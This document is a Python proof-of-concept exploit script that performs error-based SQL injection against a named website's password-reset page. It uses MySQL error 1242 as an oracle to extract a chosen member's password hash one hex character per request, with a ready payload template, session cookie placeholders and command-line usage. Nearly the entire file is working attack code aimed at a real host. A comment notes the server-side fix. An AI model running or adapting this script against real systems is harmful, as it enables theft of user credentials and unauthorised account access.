#! /usr/bin/env python

import sys
import time

try:
    import httplib                  # Python 2
except ImportError:                 # Python 3
    import http.client as httplib

### Error-based SQL injection (MySQL: error 1242 "Subquery returns more than 1 row" is the oracle)
### PoC: recovers member password hashes, one hex character per request.
### Works only while the application echoes database errors into the page and a
### valid PHPSESSID is set in the Cookie header below. Server-side fix: parameterized
### queries for the form behind access-passwd and no database error output to users.
### Author : Onemore
### Usage : ./piege.py Username

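# Hex alphabet probed at every hash position. The odd ordering is kept from the
# original script; it only changes the order in which symbols are tried.
CHARSET = ['0', '9', '8', '7', '6', '5', '4', '3', '2', '1',
           'a', 'b', 'c', 'd', 'e', 'f']

HASH_LEN = 32   # positions to recover; 32 hex digits is MD5-sized (assumed, not verified here)
DELAY = 10      # seconds slept before every probe: a full run is up to 512 requests / ~85 min

SITE = 'hackbbs.org'
PAGE = '/index.php?nav=outils&page=access-passwd'

# MySQL error 1242. The oracle only works while the application echoes the
# database error into the page; once it stops doing so every probe looks negative.
ORACLE = 'Subquery returns more than 1 row'

# Host and Content-Length are added by HTTPConnection.request(). The PHPSESSID
# values are placeholders: replace them with a live session before running.
HEADERS = {
    'User-Agent': ' Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3',
    'Accept-Encoding': '',
    'Referer': 'http://hackbbs.org/index.php?nav=outils&page=access-passwd',
    'Cookie': 'PHPSESSID=xxxxxxxxxxxxxx; name=EROMENO; PHPSESSID=xxxxxxxxxxxxxx',
    'Content-Type': 'application/x-www-form-urlencoded',
    'DNT': '1',
    'Connection': 'keep-alive',
}

# POST body template. {name} is inserted between single quotes unescaped, so a
# quote in it breaks the query. On a match IF() evaluates a multi-row subquery,
# which makes MySQL raise error 1242; otherwise the literal '1337' is selected
# and the page renders normally. '%%' is sent raw (not URL-encoded), exactly as
# the original did.
PAYLOAD = ("user=user',(if((SELECT ORD(SUBSTRING(pass,{pos},1)) FROM membre "
           "WHERE name = '{name}')={code},(select name from membre where name "
           "like '%%'),'1337')),'site')#&pass=te&site=te")


def build_payload(name, pos, ch):
    """Return the POST body that tests whether hash[pos] == ch for member *name*.

    *pos* is 1-based (MySQL SUBSTRING); *ch* is a single character whose code
    point is compared against ORD() of the hash character at that position.
    """
    return PAYLOAD.format(pos=pos, name=name, code=ord(ch))


def send_probe(body):
    """POST *body* to the target and return the response body as text.

    A fresh connection is opened per probe and always closed, so the several
    hundred requests of a run do not leak sockets (the original never closed
    its httplib.HTTP objects). Only the body is inspected downstream; the
    original also scanned the response headers, where the error text is not
    expected to appear.
    """
    conn = httplib.HTTPConnection(SITE)
    try:
        conn.request('POST', PAGE, body, HEADERS)
        return conn.getresponse().read().decode('latin-1', 'replace')
    finally:
        conn.close()


def leak_hash(name, length=HASH_LEN, delay=DELAY, send=send_probe):
    """Recover *length* hash characters of member *name*, one probe per symbol.

    Returns the characters recovered so far. Stops early when no CHARSET
    symbol matches at a position: that is what an expired session, an unknown
    user or a page that no longer echoes DB errors look like, and the original
    silently went on and returned a short hash. *send* is injectable for tests.
    """
    recovered = ''
    for pos in range(1, length + 1):
        for ch in CHARSET:
            time.sleep(delay)   # rate limiting, as in the original (before every probe)
            if ORACLE in send(build_payload(name, pos, ch)):
                recovered += ch
                print('Hash en cours.... %s' % recovered)
                break
        else:
            print('No symbol matched at position %d; stopping (expired session, '
                  'unknown user, or DB errors no longer echoed?)' % pos)
            break
    return recovered


def main(argv=None):
    """CLI entry point: ./piege.py Username. Returns the process exit status."""
    argv = sys.argv if argv is None else argv
    if len(argv) != 2:
        sys.stderr.write('Usage: %s Username\n' % argv[0])
        return 2
    # The target apparently stores member names reversed and upper-cased (the
    # session cookie carries name=EROMENO for author "Onemore"); the transform
    # is kept from the original and is target-specific.
    name = argv[1][::-1].upper()
    recovered = leak_hash(name)
    print('User : %s' % name[::-1])
    print('Hash : %s' % recovered)
    return 0


if __name__ == '__main__':
    sys.exit(main())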
